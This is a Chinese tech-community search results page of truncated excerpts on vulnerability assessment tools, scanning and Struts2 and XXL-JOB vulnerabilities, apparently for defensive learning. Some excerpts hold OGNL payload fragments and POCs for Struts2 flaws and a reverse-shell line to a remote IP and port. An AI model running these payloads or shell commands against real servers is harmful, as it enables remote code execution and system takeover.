首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏科技云报道

    漏洞管理受重视,企业如何做好漏洞评估

    那么,针对漏洞管理,企业应当如何做好漏洞及安全风险评估工作呢? 很多企业直到成为网络攻击的受害者,方知网络安全的重要性,但已为时已晚,危害已经产生。 针对漏洞评估 企业能做什么? 对于企业而言,及时发现自身设备及网络的安全漏洞,是进行安全防护的重要前提。 以下措施或许能够帮助到进行漏洞评估的企业。 1.与利益相关者沟通 在进行漏洞评估时,很多人认为扫描过程是其中最重要的部分,但有时并非如此。 与利益相关者进行及时有效的沟通协商也是关键。 2.确定安全评估的范围和规模 在确定了利益相关者之后,所有成员必须通过协作确定安全评估的范围和规模,包括设备、网络、服务或其他。 重视漏洞管理,做好漏洞评估,将为企业网络安全建设带来事半功倍的效果。

    2.6K20编辑于 2022-04-16
  • 来自专栏Chasays

    音频质量评估-2

    音频质量评估-1:之前主要学习了音视频的编码和解码原理,和测试音频质量的方法。接下来继续学习下当前 短视频 领域的 视频质量测试方法。 Convert the images to grayscale grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY) grayB = cv2.cvtColor (imageB, cv2.COLOR_BGR2GRAY) # 5. 延时 网络因子 --- 带宽, 网络拥塞 除此之外呢,就是对视频画面也就是视频帧观感的评估, 业界有主观和客观的。 这种评估标准适合与线上无原始参考视频序列的无线和IP视频业务,或者输入和输出差异化的模型,比如说视频增强,视频合并等场景 测试框架 目前知晓的有2个,一个 QoSTestFramework,一个是Netflix

    1.7K10编辑于 2021-12-06
  • 来自专栏机器学习/数据可视化

    模型评估方法-2

    评估方法 在实际中,通常需要通过实现对学习器的泛化误差进行评估并进而做出选择。需要使用一个测试集来测试学习器对新样本的判别能力,然后以测试误差近似作为“泛化误差”。 在S上进行训练模型,在T上进行测试和评估误差,作为对泛化误差的估计。注意点: 训练/测试集合的划分应该尽量保持数据分布的一致性,避免因为数据划分过程而引入额外的偏差。 比如S中350个正例,350个反例;T中150个正例,150个反例 即使确定了划分比例之后,不同的划分方法仍然对模型的评估造成缺别。 交叉验证法 现将数据集合D划分成k个大小相似的互斥子集D_1,D_2,…,D_k。每个子集尽量保持数据分布的一致性,即从D中分层采样得到。 交叉验证法评估结果的稳定性和保真性在很大程度上是取决于k值,其最常用的是10,称之为10折交叉验证法。 交叉验证也需要随机使用不同的划分重复p次,最终的评估结果是p次k折验证的平均值。

    81210发布于 2021-03-02
  • 来自专栏FreeBuf

    Amazon Inspector:基于云的漏洞评估工具

    关于AWS Inspector Amazon Inspector是一种自动化安全评估服务,可根据Amazon云中的合规性评估已部署资源的安全漏洞。 AWS Inspector是一项非常重要的安全评估服务,因为它会生成自动报告,其中包含了所选资源的详细结果。它会根据漏洞的严重程度对漏洞进行优先级排序,从而使你可以轻松了解哪些软件需要立即进行修补。 在本文中,我们将了解AWS Inspector如何与EC2实例通信以评估服务器的安全性。我们还将学习如何配置AWS inspector以执行自动化安全评估任务。 而AWS inspector则是在所有EC2实例中安装一个代理,然后在内部检查所有可能的漏洞,并提供包含建议缓解措施的详细报告。。 下面给出了配置AWS Inspector所涉及的步骤摘要: 登录EC2实例 在EC2实例上配置inspector agent 通过AWS console配置评估目标 配置评估模板 配置评估规则 执行评估

    2.7K30发布于 2019-08-26
  • 来自专栏FreeBuf

    2023版漏洞评估工具Top10

    前言 对于发现资产中已知漏洞、配置不当等问题的工具,大家习惯性称之为“漏洞扫描”工具,但随着技术演进,很多工具越来越智能,逐渐具备分析总结能力,因此将它们称为“漏洞评估”工具似乎更准确。 大多数漏洞评估工具都能覆盖常规漏洞,例如OWASP Top10,但一般都各有所长。常见的区分维度包括部署灵活性、扫描速度、扫描准确度以及与流程管理、代码开发等平台的整合性。 Nikto2(Web Server) 传送门 https://cirt.net/Nikto2 Nikto2是一个开源的web server扫描器,可发现风险文件、程序、错误配置。 主要功能 漏洞评估; 访问公共漏洞数据库; OpenSCAP Base提供经NIST认证的命令行扫描工具,以及图形用户界面便于使用; OpenSCAP Daemon可根据SCAP标准对基础设施进行持续扫描 而OpenVAS是Nessus的一个开源分支,功能丰富,漏洞来源广泛,可对传统端点和网络进行大规模的漏洞评估

    2.6K20编辑于 2023-02-24
  • 来自专栏云基础安全

    Web风险评估:腾讯云Web漏洞扫描

    一、认识腾讯云Web漏洞扫描 Web 漏洞扫描是用于监测网站漏洞的安全服务,为企业提供 7*24 小时准确、全面的漏洞监测服务,并为企业提供专业的修复建议, 从而避免漏洞被黑客利用,影响网站安全。 了解腾讯云Web漏洞扫描: https://cloud.tencent.com/product/cws image.png ---- 二、Web漏洞扫描器价值 目前的大多数应用都是web应用,http web应用漏洞就是利用这个合法的通路,采用SQL注入、跨站脚本、表单破解等应用攻击方式来获取服务器的高级权限。在目前的网络环境下,威胁最大的漏洞形式就是web应用漏洞,通常是攻击者攻陷服务器的第一步。 常见的漏洞包括SQL注入、跨站脚本攻击、和编码漏洞等,表单破解主要是针对服务器用户的弱口令破解。 Web漏洞扫描以黑客视角,通过定期扫描,监测、发现Web应用漏洞,并提供修复建议,帮助加强业务系统安全性,大幅减少Web应用漏洞暴露给网站及Web业务带来的风险问题。

    7.6K00发布于 2018-09-09
  • 来自专栏全栈程序员必看

    java struts2 漏洞_Struts2漏洞简述

    S2-005漏洞 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。 S2-013漏洞 漏洞触发: 由于官方没有发补丁,所以最新版本的struts2还是有漏洞的,可以下载最新:Apache Struts 2.3.14 GA的示例应用。 请勿任意尝试,漏洞利用代码会让对方站点挂掉 S2-032漏洞 此次漏洞存在于struts2的动态方法引用功能。 S2-037漏洞 S2-037的漏洞利用思路建立在s2-033的基础只上,还是对method没有进行过滤导致的,漏洞影响Struts 2.3.20 – Struts 2.3.28.1版本,使用到REST Poc: image.png S2-045漏洞 漏洞分析 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码通过http报文头部的Content-Type字段传递给存在漏洞的服务器

    1.6K30编辑于 2022-09-09
  • 来自专栏全栈程序员必看

    java struts2 漏洞_struts2漏洞列表

    漏洞参考】 http://struts.apache.org/2.x/docs/s2-001.html XWork 绕过参数拦截器执行OGNL语句 【官方ID】S2-003 【危害等级】高 【受影响版本 【漏洞参考】 http://struts.apache.org/2.x/docs/s2-003.html 目录遍历漏洞可以获取服务器静态文件 【官方ID】S2-004 【危害等级】高 【受影响版本】 Struts 2.0.0 – Struts 2.0.11.2 【漏洞描述】 原因:struts2分派器设计问题。 OGNL远程代码执行漏洞 【官方ID】S2-007 【危害等级】高 【受影响版本】 Struts 2.0.0 – Struts 2.2.3 【漏洞描述】 转换错误,导致用户输入可以当做OGNL表达式执行 【Exploit】 struts2多个安全漏洞 【官方ID】S2-008 【危害等级】高 【受影响版本】 Struts 2.1.0 – Struts2.3.1 【漏洞描述】 Remote command

    1.1K20编辑于 2022-09-09
  • 来自专栏信数据得永生

    Kali Linux 秘籍 第五章 漏洞评估

    第五章 漏洞评估 作者:Willie L. Nessus 允许我们攻击很多种类的漏洞,它们取决于我们的版本。我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞。 我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞。这个密集中,我们会配置 Nessus 来发现目标上的网络漏洞。这些漏洞针对主机或网络协议。 5.6 安装、配置和启动 OpenVAS OpenVAS,即开放漏洞评估系统,是一个用于评估目标漏洞的杰出框架。它是 Nessus 项目的分支。不像 Nessus,OpenVAS提供了完全免费的版本。 5.7 OpenVAS - 发现本地漏洞 OpenVAS 允许我们攻击很多种类的漏洞,它们取决于我们的版本。我们也需要评估的目标漏洞列表限制为针对我们想要获取的信息类型的漏洞

    1.2K10编辑于 2022-11-27
  • 来自专栏全栈程序员必看

    linux struts2漏洞,Struts2漏洞分析,漏洞波及全系版本

    Struts漏洞分析 Apache Struts团队已经发布了Struts 2.3.15.1安全更新版本。 下面就来说一下之前版本,Struts2漏洞是如何产生的,我们自己去做,该如何的去解决这个安全漏洞: 我听有人说: “这算什么漏洞”,我想说的是:“你在浏览器就能把别个服务器搞蹦掉,让它停掉没工作了,这能不是高危漏洞么 【说明: url中的\u0023实际上是代表#号,%20实际上是代表空格,\u003实际上是代表等于】 2.产生漏洞的原因如下: 上面的地址被浏览器会翻译成: ? 3.为什么会产生这样的漏洞呢? struts2提供了存储数据valueStack struts2提供了访问数据的ognl表达式 ognl表达式不但可以访问到valueStack中的值,而且还可以改变valueStack中的值调用valueStack.setValue

    1.4K30编辑于 2022-09-09
  • 来自专栏耕耘实录

    几款Linux系统漏洞扫描、评估工具简介

    二、Nessus Nessus是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 Nessus会时常更新,且具有全面报告、主机扫描以及实时漏洞搜索的功能。但是,Nessus也可能会出现误报和漏报。 这是一款收费软件,对于一般用户有7天的使用时间。 官方网站为:nessus.org 三、OpenVAS OpenVAS (Open Vulnerability Assessment System,开放式漏洞评估系统)是一套可用于扫描漏洞和全面漏洞管理的工具和服务系统 Nikto 不仅可用于检查 CGI 漏洞,还可以躲避的方式运行,以便躲避入侵探测系统。Nikto 所提供完整的文档资料,在运行程序前,应当仔细查核。 在稍后的文章中我们再进行深入探讨(https://cirt.net/nikto2-docs/index.html)。

    4.8K30发布于 2018-12-20
  • 来自专栏全栈程序员必看

    java struts2 漏洞_Struts2漏洞利用「建议收藏」

    Struts漏洞合集 Struts-S2-013漏洞利用 受影响版本 Struts 2.0.0 – Struts 2.3.14.1 漏洞利用 任意命令执行POC: ${(#_memberAccess[“ ()%7D Struts-S2-001漏洞利用 影响版本 Struts2.0.0 – Struts2.3.15 漏洞利用 获取tomcat执行路径: %{“tomcatBinDir{“+@java.lang.System 016漏洞利用 影响版本 2.0.0 – 2.3.15 执行命令 redirect:${#context[“xwork.MethodAccessor.denyMethodExecution”]=false 045漏洞利用 影响版本 Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 POC %{#context[‘com.opensymphony.xwork2 (#ros.flush())} Struts-S2-057漏洞利用 受影响版本 Struts 2.3 – 2.3.34 Struts 2.5 – 2.5.16 POC $%7B233*233%7D

    1.3K50编辑于 2022-09-09
  • 来自专栏小鹏的专栏

    机器学习-2:MachineLN之模型评估

    那么我的问题是: (1)为什么要评估模型? (2评估模型有哪些方法? (3)不同的方法针对什么问题? (4)根据评估的结果如何调优? (5)根据评估结果怎么判定模型训练完成? (2评估模型有哪些方法? 在(2)中回答过了。 (4)根据评估的结果如何调优?(都是基于深度学习的,?) 当训练集的效果(准确率)上不去,和贝叶斯估计(人的表现)存在一定差距的时候: (1)增加模型的复杂度。  还有像样本预处理: (1)归一化:img/255.0,img-0.5, img*2,将数据转化为[-1,1]. (2)减去均值除以方差。 (3)减去样本各通道的均值。 机器学习-1:MachineLN之三要素 2. 机器学习-2:MachineLN之模型评估 3. 机器学习-3:MachineLN之dl 4. 机器学习-4:DeepLN之CNN解析 5. 

    58320编辑于 2022-05-09
  • 来自专栏网络安全615

    漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

    二,s2-045漏洞形成分析 CVE编号:CVE- 2017- 5638 POST请求发送数据 功能:获取WEB路径,任意命令执行,反弹shell和文件上传  首先,我们先对比一下修复前与修复后的版本 ,可使远程攻击者通过构造的OGNL表达式,执行任意代码 在TextParseUtil.java中找到return parser 发现在这调用了ognl的方法,这就是漏洞形成的原因  三,s2-045 漏洞复现 Struts2漏洞利用扫描工具及其环境 Structs2高危漏洞exp的扫描利用工具(2018) 链接:https://pan.baidu.com/s/1rOMjz-7xOYGyJdh4pdddCQ   提取码:aero  漏洞环境 链接:https://pan.baidu.com/s/1w7yAmprETRfPNiF5mJ8Rdg  提取码:5b1r   部署s2-045漏洞环境 .multipart/form-data   再运用漏洞检查工具检测出了        S2-045漏洞 

    3.3K20编辑于 2022-11-19
  • 来自专栏OneMoreThink的专栏

    漏洞实战(2):XXL-JOB默认密钥漏洞

    2、危害 攻击者可以对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 /dev/tcp/10.58.81.108/4444 0>&1", 4、防御 修改accessToken的默认值,调度中心和执行器的值需保持一致,例如将accessToken修改为cGqJjTqH2VMB2R1 : sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-admin/src/main/resources /application.properties sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-executor-samples ,成功修复漏洞

    3.3K10编辑于 2024-10-15
  • 来自专栏全栈程序员必看

    struts2漏洞复现

    struts2漏洞复现 目录 简介 判断框架 S2-061远程执行代码漏洞 S2-059 远程代码执行漏洞 S2-057 远程命令执行漏洞 S2-053 远程代码执行漏洞 工具 简介 Struts2 S2-061远程执行代码漏洞 S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。 (#execute.exec(#arglist))} ------WebKitFormBoundaryl7d1B1aGsV2wcZwF-- 反弹shell: S2-059 远程代码执行漏洞 Apache = requests.post(url, data=data2) # print(res2.text) S2-057 远程命令执行漏洞 当Struts2的配置满足以下条件时: alwaysSelectFullNamespace 053 远程代码执行漏洞 Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。

    1.4K40编辑于 2022-09-07
  • 来自专栏依乐祝

    SQL Server数据库漏洞评估了解一下

    SQL Server Management Studio 17.4或更高版本的SSMS中提供了SQL Server漏洞侦测(VA)功能,此功能允许SQL Server扫描您的数据库以查找潜在的安全漏洞, 实战演练 要运行漏洞侦测,只需选择我们需要扫描的数据库,然后右键单击并选择“任务”。在这里,您将看到漏洞评估选项接着选择扫描漏洞。 我真的很喜欢这个特性,并且它是一个方便的脚本,用于以后评估其他服务器的健康状况时使用。它甚至给了我们一个小的复制按钮,以复制出脚本和选项打开它在查询窗口。 ? 基线允许您对结果报告中的错误结果进行接收,这样在下次漏洞扫描的时候这个错误的结果就不会出现在错误列表里面了。 ? 总结 SQL Server漏洞评估评估数据隐私、安全性和遵从性标准的一个非常好的第三方工具,并且非常容易使用。纸上得来终觉浅,还不赶紧尝试一下,看看数据库存在哪些可以提升的地方吧。

    1.4K30发布于 2018-12-28
  • 来自专栏Tommonkey

    Struct2系列漏洞

    “SSM”所代替,具体原因出来性能方面的提高,还要就是struct2漏洞实在是太多,像国内BAT都被坑了一波,更别说ZF机关。 OGNL表达式 struct2系列漏洞最开始是使用的OGNL表达式造成非法调用,OGNL是Object Graphic Navigation Language(对象图导航语言)的缩写,他是一个开源项目。 表达式 靶场演示 声明:靶场与相关POC,EXP来源与vulhub s2-001远程代码执行漏洞漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value ()%7D 靶场演示 s2-015命令命令执行 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: <package name="S<em>2</em>- OGNL表达式计算,导致远程命令执行<em>漏洞</em>。

    1.9K21编辑于 2023-03-20
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-2

    Web服务有个很有名的词: LAMP(1.Linux 2.Apache 3.Mysql 4.PHP) 比如一个网站的发帖留言功能,在网页提交,PHP将你的留言提交到数据库中,PHP登陆数据库调用你所有的留言 image.png 2.打开Apache服务 2.打开Apache服务 /etc/init.d/apache2 start /etc/init.d/apache2 status #使用start打开Apache 服务,顺便用status查看是否顺利打开 或者是这样也可以 cd /etc/apache2 systemctl restart apache2 systemctl status apache2 image.png image.png 2.运行php -v可以看到php是配置好的 image.png (注意:如果是7.3版本的mysql要改成mysqli,这里我们是7.4.5) 3.MySQL 1.同上Kali虚拟机中有 image.png 2.打开MySQL服务 2.打开MySQL服务 cd /etc systemctl start mysql systemctl status mysql 或者这种方式也可以: sudo

    43920编辑于 2022-03-18
  • 来自专栏全栈程序员必看

    Struts2漏洞总结

    14年Struts2报出Struts2漏洞(2.0.0<=version<=2.3.15), 17年3月这次的S-045漏洞,被入侵者植入了后门程序, 1. Struts2的重定向漏洞 根据Apache给出的漏洞修复方案,只是升级了jar包版本2.3.16 升级完成后所有页面访问都出现了404,如下bug: There is no Action mapped 2. Struts2 OGNL的高危漏洞S-045 Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。 针对此问题做出如下修改: (1)根据Apache给出的漏洞修复方案,升级Struts2相关jar到2.3.32 (2)关于上传文件部分做出如下验证 <1>上传文件非空验证; <2>上传文件格式验证

    1.1K20编辑于 2022-09-09
领券